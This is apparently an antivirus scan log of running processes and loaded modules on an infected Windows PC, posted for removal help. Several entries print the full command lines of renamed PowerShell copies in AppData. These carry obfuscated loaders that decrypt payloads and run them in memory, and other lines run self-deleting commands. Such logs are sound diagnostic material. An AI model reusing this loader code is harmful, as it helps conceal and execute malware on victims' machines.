c:\program files\lghub\system_tray\lghub_system_tray.exe Script: Quarantine, Delete, Delete via BC, Terminate	17900	G HUB	Copyright © Logitech, Inc. 2023	2D03CA84BF3FB6B27B57DCA2B47D9EF1	21525.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:47 Command line:
c:\program files\lghub\lghub_updater.exe Script: Quarantine, Delete, Delete via BC, Terminate	6160	LGHUB Updater	Copyright © Logitech, Inc. 2023	AD1486369C58B6E7B45C0CE3E15A5C4F	10341.75 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\logi_crashpad_handler.exe Script: Quarantine, Delete, Delete via BC, Terminate	18696	LGHUB Crashpad Handler	Copyright © Logitech, Inc. 2023	B251FBDCBD72EE784AAFFEEA6FDBD39E	958.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46 Command line:
c:\program files\lghub\logi_crashpad_handler.exe Script: Quarantine, Delete, Delete via BC, Terminate	18676	LGHUB Crashpad Handler	Copyright © Logitech, Inc. 2023	B251FBDCBD72EE784AAFFEEA6FDBD39E	958.25 kb, rsAh,created: 23.06.2023 12:22:50,modified: 23.06.2023 12:22:46 Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe Script: Quarantine, Delete, Delete via BC, Terminate	20968	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.	2A311AEB829A5AE4BB6D0FB4D547883A	3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56 Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe Script: Quarantine, Delete, Delete via BC, Terminate	24888	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.	2A311AEB829A5AE4BB6D0FB4D547883A	3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56 Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe Script: Quarantine, Delete, Delete via BC, Terminate	22860	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.	2A311AEB829A5AE4BB6D0FB4D547883A	3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56 Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe Script: Quarantine, Delete, Delete via BC, Terminate	15480	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.	2A311AEB829A5AE4BB6D0FB4D547883A	3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56 Command line:
c:\program files (x86)\microsoft\edge\application\msedge.exe Script: Quarantine, Delete, Delete via BC, Terminate	17488	Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.	2A311AEB829A5AE4BB6D0FB4D547883A	3992.45 kb, rsAh,created: 22.05.2021 04:55:33,modified: 21.07.2023 02:00:56 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	22432	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	6408	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	19064	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	22504	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	22072	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\microsoft\edgewebview\application\115.0.1901.183\msedgewebview2.exe Script: Quarantine, Delete, Delete via BC, Terminate	5256	Microsoft Edge WebView2	Copyright Microsoft Corporation. All rights reserved.	69953766AA774855005410E3AD01A4EF	3542.45 kb, rsAh,created: 23.07.2023 03:50:05,modified: 21.07.2023 02:01:54 Command line:
c:\program files (x86)\nvidia corporation\nvnode\nvidia web helper.exe Script: Quarantine, Delete, Delete via BC, Terminate	5200	NVIDIA Web Helper Service	Copyright Node.js contributors. MIT license.	67F0001FA4410A89C7393AA5656CCF9A	28757.05 kb, rsAh,created: 21.04.2020 17:46:02,modified: 20.01.2023 11:43:31 Command line: "C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe" index.js
d:\oculus\support\oculus-runtime\ovrredir.exe Script: Quarantine, Delete, Delete via BC, Terminate	8296	OVR Redir	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.	6638A1032560A07D5F9C4B8EDDB96AD7	1110.05 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:07 Command line:
d:\oculus\support\oculus-runtime\ovrserver_x64.exe Script: Quarantine, Delete, Delete via BC, Terminate	8136	OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.	3BA56B9B20C7F7376D04F6D589A1AF84	8821.55 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:14 Command line:
d:\oculus\support\oculus-runtime\ovrservicelauncher.exe Script: Quarantine, Delete, Delete via BC, Terminate	6512	OVR Service Launcher	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.	A2B74491FEA414EB81A66702A4C09A05	497.05 kb, rsAh,created: 06.07.2023 17:34:03,modified: 06.07.2023 17:34:14 Command line:
c:\program files\windowsapps\microsoft.yourphone_1.23022.140.0_x64__8wekyb3d8bbwe\phoneexperiencehost.exe Script: Quarantine, Delete, Delete via BC, Terminate	15404	Microsoft Phone Link	© Microsoft Corporation. All rights reserved.	5BA525138798C396F0A53D18100F8F6E	337.93 kb, rsAh,created: 28.03.2023 21:15:49,modified: 28.03.2023 21:15:51 Command line:
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Script: Quarantine, Delete, Delete via BC, Terminate	17304	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03 Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(15860);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Script: Quarantine, Delete, Delete via BC, Terminate	19404	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03 Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(13932);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Script: Quarantine, Delete, Delete via BC, Terminate	13340	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03 Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(17660);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Script: Quarantine, Delete, Delete via BC, Terminate	16812	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03 Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(16056);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Script: Quarantine, Delete, Delete via BC, Terminate	16700	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rsAh,created: 05.05.2023 07:56:03,modified: 05.05.2023 07:56:03 Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(16816);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Registry.exe Script: Quarantine, Delete, Delete via BC, Terminate	220			X	error getting file info Command line:
Secure System Script: Quarantine, Delete, Delete via BC, Terminate	172			X	error getting file info Command line:
c:\program files\nzxt cam\resources\app.asar.unpacked\node_modules\@nzxt\cam-core\dist\target\x86_64-pc-windows-msvc\release\service.exe Script: Quarantine, Delete, Delete via BC, Terminate	6172			8AD5E28A96DCD7D747C2C1711CDE9EAE	632.94 kb, rsAh,created: 06.07.2023 00:16:45,modified: 05.07.2023 11:34:42 Command line:
c:\program files\blue sherpa\sherpa_service.exe Script: Quarantine, Delete, Delete via BC, Terminate	6224			5B91B726024F50EE28219D0678A8DCE9	339.92 kb, rsAh,created: 01.08.2020 11:58:35,modified: 01.08.2020 11:58:35 Command line:
c:\program files (x86)\steam\steam.exe Script: Quarantine, Delete, Delete via BC, Terminate	13792	Steam	Copyright (C) 2021 Valve Corporation	DFBE353AFC628A41715D502D14EA05C5	4271.85 kb, rsAh,created: 21.05.2018 19:30:20,modified: 21.07.2023 14:04:18 Command line: "C:\Program Files (x86)\Steam\steam.exe"
c:\program files (x86)\common files\steam\steamservice.exe Script: Quarantine, Delete, Delete via BC, Terminate	15932	Steam Client Service	Copyright (C) Valve Corporation	F3C774E5A943BDA90247B3DFD8EF57C9	2600.35 kb, rsAh,created: 21.04.2020 17:32:29,modified: 21.07.2023 14:04:18 Command line: "C:\Program Files (x86)\Common Files\Steam\SteamService.exe" /RunAsService
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	10204	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	7860	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	21056	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	15024	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	5312	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe Script: Quarantine, Delete, Delete via BC, Terminate	21324	Steam Client WebHelper	Copyright (C) 2014 Valve Corporation	4CBE63462BD4B99E0D1E0F1A133FEBE3	6992.35 kb, rsAh,created: 29.04.2020 11:57:29,modified: 21.07.2023 14:04:22 Command line:
c:\users\isaac\appdata\roaming\tdsul.bat.exe Script: Quarantine, Delete, Delete via BC, Terminate	15860	Windows PowerShell	© Microsoft Corporation. All rights reserved.	FC02C8A46596C09687741EB41AC48674	411.00 kb, rSaH,created: 23.07.2023 02:12:17,modified: 07.05.2022 00:20:22 Command line: "C:\Users\Isaac\AppData\Roaming\tDSul.bat.exe" $PrEI='MaHHDxinHHDxModHHDxuHHDxleHHDx'.Replace('HHDx', '');$aREe='TrHHDxaHHDxnsHHDxfoHHDxrmFiHHDxnalHHDxBloHHDxckHHDx'.Replace('HHDx', '');$Gvgk='InvHHDxoHHDxkeHHDx'.Replace('HHDx', '');$LtTR='FiHHDxrstHHDx'.Replace('HHDx', '');$ZgSU='CrHHDxeateHHDxDeHHDxcrHHDxyptHHDxorHHDx'.Replace('HHDx', '');$YSxT='CHHDxhangHHDxeEHHDxxHHDxtHHDxeHHDxnsioHHDxnHHDx'.Replace('HHDx', '');$fKSF='ReHHDxadLiHHDxnesHHDx'.Replace('HHDx', '');$xAyL='SHHDxpHHDxliHHDxtHHDx'.Replace('HHDx', '');$Vzkv='EnHHDxtHHDxrHHDxyPHHDxoHHDxiHHDxntHHDx'.Replace('HHDx', '');$fnBm='FrHHDxomHHDxBaseHHDx64HHDxStHHDxringHHDx'.Replace('HHDx', '');$Psuz='GeHHDxtCuHHDxrreHHDxntHHDxPrHHDxoHHDxcesHHDxsHHDx'.Replace('HHDx', '');$fnDF='LHHDxoadHHDx'.Replace('HHDx', '');function tnErk($Wlyep){$DXKAy=[System.Security.Cryptography.Aes]::Create();$DXKAy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$DXKAy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$DXKAy.Key=[System.Convert]::$fnBm('ry9GUVCx258nQ7DsjJDFsfvglh0Vz9cnANJgttim66A=');$DXKAy.IV=[System.Convert]::$fnBm('6aTj73IRz+Lv6PJ0wxKX4A==');$xHagb=$DXKAy.$ZgSU();$LJfRU=$xHagb.$aREe($Wlyep,0,$Wlyep.Length);$xHagb.Dispose();$DXKAy.Dispose();$LJfRU;}function hNSbn($Wlyep){$RsPel=New-Object System.IO.MemoryStream(,$Wlyep);$PYnIK=New-Object System.IO.MemoryStream;$kQDoC=New-Object System.IO.Compression.GZipStream($RsPel,[IO.Compression.CompressionMode]::Decompress);$kQDoC.CopyTo($PYnIK);$kQDoC.Dispose();$RsPel.Dispose();$PYnIK.Dispose();$PYnIK.ToArray();}$Tgnkw=[System.Linq.Enumerable]::$LtTR([System.IO.File]::$fKSF([System.IO.Path]::$YSxT([System.Diagnostics.Process]::$Psuz().$PrEI.FileName, $null)));$FGZNF=$Tgnkw.Substring(3).$xAyL(':');$oBRiH=hNSbn (tnErk ([Convert]::$fnBm($FGZNF[0])));$tpcvV=hNSbn (tnErk ([Convert]::$fnBm($FGZNF[1])));[System.Reflection.Assembly]::$fnDF([byte[]]$tpcvV).$Vzkv.$Gvgk($null,$null);[System.Reflection.Assembly]::$fnDF([byte[]]$oBRiH).$Vzkv.$Gvgk($null,$null);
c:\users\isaac\appdata\roaming\tmaie.bat.exe Script: Quarantine, Delete, Delete via BC, Terminate	13932	Windows PowerShell	© Microsoft Corporation. All rights reserved.	FC02C8A46596C09687741EB41AC48674	411.00 kb, rSaH,created: 11.04.2023 21:19:39,modified: 07.05.2022 00:20:22 Command line: "C:\Users\Isaac\AppData\Roaming\tMaIE.bat.exe" $fdxF='TrKRgYansKRgYforKRgYmFinKRgYalBKRgYlocKRgYkKRgY'.Replace('KRgY', '');$CKDY='EnKRgYtryKRgYPoKRgYintKRgY'.Replace('KRgY', '');$PvqB='FrKRgYomBaKRgYsKRgYe6KRgY4KRgYSKRgYtKRgYrKRgYiKRgYngKRgY'.Replace('KRgY', '');$VUbu='ChKRgYanKRgYgeKRgYExKRgYtKRgYensKRgYiKRgYonKRgY'.Replace('KRgY', '');$CgYQ='InvKRgYokKRgYeKRgY'.Replace('KRgY', '');$xOpm='SplKRgYitKRgY'.Replace('KRgY', '');$YdcC='LoaKRgYdKRgY'.Replace('KRgY', '');$asUp='RKRgYeadKRgYLiKRgYneKRgYsKRgY'.Replace('KRgY', '');$YxDA='CKRgYreKRgYaKRgYteDKRgYecKRgYrypKRgYtorKRgY'.Replace('KRgY', '');$axDS='FirKRgYstKRgY'.Replace('KRgY', '');$JyLQ='MaiKRgYnMKRgYoduKRgYleKRgY'.Replace('KRgY', '');$TQuP='GetKRgYCuKRgYrKRgYrenKRgYtPrKRgYoKRgYceKRgYssKRgY'.Replace('KRgY', '');function IPKzZ($BgAHr){$hofSw=[System.Security.Cryptography.Aes]::Create();$hofSw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hofSw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hofSw.Key=[System.Convert]::$PvqB('S5FfqpbWy9YZf9pni8bPrMfCyD6Aw8PkuVCr3TKCoU0=');$hofSw.IV=[System.Convert]::$PvqB('J3Tz/aUwtodoHrt4N+o9yQ==');$CZjcp=$hofSw.$YxDA();$DEcRy=$CZjcp.$fdxF($BgAHr,0,$BgAHr.Length);$CZjcp.Dispose();$hofSw.Dispose();$DEcRy;}function hcbBw($BgAHr){$QJpza=New-Object System.IO.MemoryStream(,$BgAHr);$RRoPM=New-Object System.IO.MemoryStream;$GcMxE=New-Object System.IO.Compression.GZipStream($QJpza,[IO.Compression.CompressionMode]::Decompress);$GcMxE.CopyTo($RRoPM);$GcMxE.Dispose();$QJpza.Dispose();$RRoPM.Dispose();$RRoPM.ToArray();}$bKplR=[System.Linq.Enumerable]::$axDS([System.IO.File]::$asUp([System.IO.Path]::$VUbu([System.Diagnostics.Process]::$TQuP().$JyLQ.FileName, $null)));$FaxOh=$bKplR.Substring(3).$xOpm(':');$cRKCf=hcbBw (IPKzZ ([Convert]::$PvqB($FaxOh[0])));$xJTIT=hcbBw (IPKzZ ([Convert]::$PvqB($FaxOh[1])));[System.Reflection.Assembly]::$YdcC([byte[]]$xJTIT).$CKDY.$CgYQ($null,$null);[System.Reflection.Assembly]::$YdcC([byte[]]$cRKCf).$CKDY.$CgYQ($null,$null);
c:\program files\virtual desktop\virtualdesktop.service.exe Script: Quarantine, Delete, Delete via BC, Terminate	6192	Virtual Desktop Service	Copyright © Virtual Desktop, Inc. 2014-2022	312DF874CE11F4078662622310E074E5	10407.71 kb, rsAh,created: 16.12.2022 13:24:54,modified: 16.12.2022 13:24:54 Command line:
c:\program files\windowsapps\microsoftwindows.client.webexperience_423.8900.0.0_x64__cw5n1h2txyewy\dashboard\widgets.exe Script: Quarantine, Delete, Delete via BC, Terminate	11036		© Microsoft Corporation. All rights reserved.	E4AF9A94CEBD6FF01F1D933ED72B2910	2138.74 kb, rsAh,created: 05.04.2023 18:07:33,modified: 05.04.2023 18:07:36 Command line:
c:\program files\windowsapps\microsoftwindows.client.webexperience_423.8900.0.0_x64__cw5n1h2txyewy\dashboard\widgetservice.exe Script: Quarantine, Delete, Delete via BC, Terminate	16268			EEE1208CA71B80E786D708F203375866	179.29 kb, rsAh,created: 05.04.2023 18:07:33,modified: 05.04.2023 18:07:36 Command line:
c:\users\isaac\appdata\roaming\xtuvv.bat.exe Script: Quarantine, Delete, Delete via BC, Terminate	16816	Windows PowerShell	© Microsoft Corporation. All rights reserved.	B94110F627D2BA6C57EB84A0F9575B27	443.50 kb, rSaH,created: 23.07.2023 13:15:56,modified: 05.05.2023 07:56:03 Command line: "C:\Users\Isaac\AppData\Roaming\xtuvv.bat.exe" -w hidden -c $XRwR='EnteKHcreKHcyPeKHcoieKHcnteKHc'.Replace('eKHc', '');$JXEu='GeteKHcCueKHcrreKHceneKHctPeKHcroeKHcceeKHcsseKHc'.Replace('eKHc', '');$VrxS='MeKHcaineKHcMoeKHcdueKHcleeKHc'.Replace('eKHc', '');$hmqz='TreKHcaneKHcsfoeKHcrmFeKHcinaleKHcBloeKHcceKHckeKHc'.Replace('eKHc', '');$CquX='SpleKHciteKHc'.Replace('eKHc', '');$qFmP='LeKHcoeKHcaeKHcdeKHc'.Replace('eKHc', '');$EtZB='CeKHcreateKHceDeKHcecryeKHcpeKHctoeKHcreKHc'.Replace('eKHc', '');$pXCM='CeKHchangeKHceeKHcEeKHcxteneKHcsioeKHcneKHc'.Replace('eKHc', '');$xgQY='FieKHcrseKHcteKHc'.Replace('eKHc', '');$xSKJ='FroeKHcmeKHcBaeKHcseeKHc64SeKHctrieKHcngeKHc'.Replace('eKHc', '');$PatU='IneKHcvokeeKHc'.Replace('eKHc', '');$TNPx='ReKHceadeKHcLeKHcieKHcneseKHc'.Replace('eKHc', '');function MvpiL($ktOmn){$YXOrJ=[System.Security.Cryptography.Aes]::Create();$YXOrJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YXOrJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YXOrJ.Key=[System.Convert]::$xSKJ('aX8cFQObeptl0Hc2tA0iQqDR9yEcFcjuIlC6FeX9Xos=');$YXOrJ.IV=[System.Convert]::$xSKJ('tojFzsW/v/Dm+adS5TQ3Mg==');$CCPCO=$YXOrJ.$EtZB();$cGSky=$CCPCO.$hmqz($ktOmn,0,$ktOmn.Length);$CCPCO.Dispose();$YXOrJ.Dispose();$cGSky;}function ivaas($ktOmn){$zolTr=New-Object System.IO.MemoryStream(,$ktOmn);$alxWJ=New-Object System.IO.MemoryStream;$yVdFW=New-Object System.IO.Compression.GZipStream($zolTr,[IO.Compression.CompressionMode]::Decompress);$yVdFW.CopyTo($alxWJ);$yVdFW.Dispose();$zolTr.Dispose();$alxWJ.Dispose();$alxWJ.ToArray();}$yjiqq=[System.Linq.Enumerable]::$xgQY([System.IO.File]::$TNPx([System.IO.Path]::$pXCM([System.Diagnostics.Process]::$JXEu().$VrxS.FileName, $null)));$DPSuV=$yjiqq.Substring(3).$CquX(':');$UWCTr=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[0])));$bpToC=ivaas (MvpiL ([Convert]::$xSKJ($DPSuV[1])));[System.Reflection.Assembly]::$qFmP([byte[]]$bpToC).$XRwR.$PatU($null,$null);[System.Reflection.Assembly]::$qFmP([byte[]]$UWCTr).$XRwR.$PatU($null,$null);
c:\program files\windowsapps\microsoft.yourphone_1.23022.140.0_x64__8wekyb3d8bbwe\yourphoneappproxy.exe Script: Quarantine, Delete, Delete via BC, Terminate	16472	YourPhoneAppProxy	© Microsoft Corporation. All rights reserved.	E0FBE7E71C802EB4181F147C91A9DC86	160.93 kb, rsAh,created: 28.03.2023 21:15:49,modified: 28.03.2023 21:15:53 Command line:
Detected:290, recognized as trusted 195

Module name	Handle	Description	Copyright	Information	Used by processes
C:\Program Files (x86)\bookingDesktopApp\Update\1.3.99.0\bookingDesktopApppdate.dll Script: Quarantine, Delete, Delete via BC	1929641984	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	MD5=BC86F38DD098C14DD93138458314851F 1703.50 kb, rsAh, created: 29.09.2020 19:53:39, modified: 29.09.2020 19:53:39	4412, 23568, 25520
C:\Program Files (x86)\bookingDesktopApp\Update\1.3.99.0\psmachine.dll Script: Quarantine, Delete, Delete via BC	1625686016	bookingDesktopApp Update	Copyright 2007-2010 Google Inc.	MD5=D1E6E619838C514AAAB7B6EF0359C9DC 194.50 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39	23568, 25520
C:\Program Files (x86)\Common Files\Steam\SteamService.dll Script: Quarantine, Delete, Delete via BC	1688338432	Steam Client Service Library	Copyright (C) Valve Corporation	MD5=97AFC6497E6BB53003233A683A191766 3302.35 kb, rsAh, created: 21.04.2020 17:33:45, modified: 21.07.2023 14:04:18	15932
C:\Program Files (x86)\GIGABYTE\AppCenter\BDR_info.dll Script: Quarantine, Delete, Delete via BC	1820065792	BDR_info DLL	Copyright (C) 2013	MD5=5722FE6AD03BC2BDA2DEDC6B0BB1E741 1824.00 kb, rsAh, created: 20.08.2021 10:16:18, modified: 20.08.2021 10:16:18	13820
C:\Program Files (x86)\Steam\bin\chromehtml.DLL Script: Quarantine, Delete, Delete via BC	1693319168			MD5=9AD781B001016B4D1484695771E10A02 1283.85 kb, rsAh, created: 21.04.2020 17:33:21, modified: 21.07.2023 14:04:18	13792
C:\Program Files (x86)\Steam\bin\filesystem_stdio.DLL Script: Quarantine, Delete, Delete via BC	1695612928	FileSystem_Stdio.dll	Copyright (C) 2005 Valve Corporation	MD5=6D9FFD067DF623F803A42A3284E91417 192.35 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18	13792
c:\program files (x86)\steam\bin\friendsui.DLL Script: Quarantine, Delete, Delete via BC	1585577984	Steam Friends UI	Copyright (C) 2005 Valve Corporation	MD5=849F8594912B5200593ABAC6B4EFC4A3 5168.85 kb, rsAh, created: 21.04.2020 17:33:18, modified: 21.07.2023 14:04:18	13792
c:\program files (x86)\steam\bin\serverbrowser.DLL Script: Quarantine, Delete, Delete via BC	1583415296	Steam Server Browser Library	Copyright (C) 2008 Valve Corporation	MD5=92876D97AC1B8BFEF423ACFB0D13BC5B 2074.85 kb, rsAh, created: 21.04.2020 17:33:20, modified: 21.07.2023 14:04:18	13792
C:\Program Files (x86)\Steam\bin\vgui2_s.DLL Script: Quarantine, Delete, Delete via BC	1694695424	vgui2_s.dll	Copyright (C) 2007 Valve Corporation	MD5=2743F0DEEC31FC8DC4C38326D73EA503 821.85 kb, rsAh, created: 21.04.2020 17:33:21, modified: 21.07.2023 14:04:20	13792
C:\Program Files (x86)\Steam\crashhandler.dll Script: Quarantine, Delete, Delete via BC	1787559936	Steam Crash Handler Library	Copyright (C) 2010	MD5=CCD6B4040498011B1126C53C31995585 367.35 kb, rsAh, created: 21.04.2020 17:33:20, modified: 21.07.2023 14:04:20	13792
C:\Program Files (x86)\Steam\libavcodec-58.dll Script: Quarantine, Delete, Delete via BC	1706033152			MD5=167C2B83570F85067FCD269DC8BDB6EB 4807.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50	13792
C:\Program Files (x86)\Steam\libavformat-58.dll Script: Quarantine, Delete, Delete via BC	1704460288			MD5=5D29247B61B3B2A53C28505F92D9B940 1469.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50	13792
C:\Program Files (x86)\Steam\libavresample-4.dll Script: Quarantine, Delete, Delete via BC	1703804928			MD5=43A5181DBC20F32106F44D9D493069C1 578.35 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50	13792
C:\Program Files (x86)\Steam\libavutil-56.dll Script: Quarantine, Delete, Delete via BC	1698758656			MD5=7CDEB2075BDE3B7CD500E50E87D291F1 1263.85 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50	13792
C:\Program Files (x86)\Steam\libswscale-5.dll Script: Quarantine, Delete, Delete via BC	1702690816			MD5=45A8D508888723E9BAD97672887676D7 1020.35 kb, rsAh, created: 28.04.2021 17:48:27, modified: 07.06.2023 04:22:50	13792
C:\Program Files (x86)\Steam\SDL3.dll Script: Quarantine, Delete, Delete via BC	1721958400	SDL	Copyright (C) 2023 Sam Lantinga	MD5=0F9836D1D3914BCE9B40268524A3FEF6 1289.85 kb, rsAh, created: 12.01.2023 17:46:16, modified: 21.07.2023 14:04:18	13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\vrclient.dll Script: Quarantine, Delete, Delete via BC	1580335104	VR Client	Copyright (C) Valve Corporation	MD5=E4D6DF1D539330BC8A060145C58C13DE 2896.31 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:04	13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\aitcamlib.dll Script: Quarantine, Delete, Delete via BC	1570570240			MD5=AACE32D89210F739CE24A9E298DCD730 164.81 kb, rsAh, created: 16.03.2023 15:26:42, modified: 13.07.2023 18:16:06	13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\AitH264Capture.dll Script: Quarantine, Delete, Delete via BC	234029056	AitH264Capture Dynamic Link Library	Copyright (C) 2010	MD5=26AE17211BEADDAA7DC5E909EF31A323 315.00 kb, rsAh, created: 21.04.2020 20:46:48, modified: 21.04.2020 20:46:48	13792
C:\Program Files (x86)\Steam\steamapps\common\SteamVR\drivers\lighthouse\bin\win32\AitUVCExtApi.dll Script: Quarantine, Delete, Delete via BC	234487808	AitUVCEx Dynamic Link Library	Copyright (C) 2009	MD5=BCD4F07BB1D8E0402C9D0E114FCD7E51 164.00 kb, rsAh, created: 21.04.2020 20:47:08, modified: 21.04.2020 20:47:08	13792
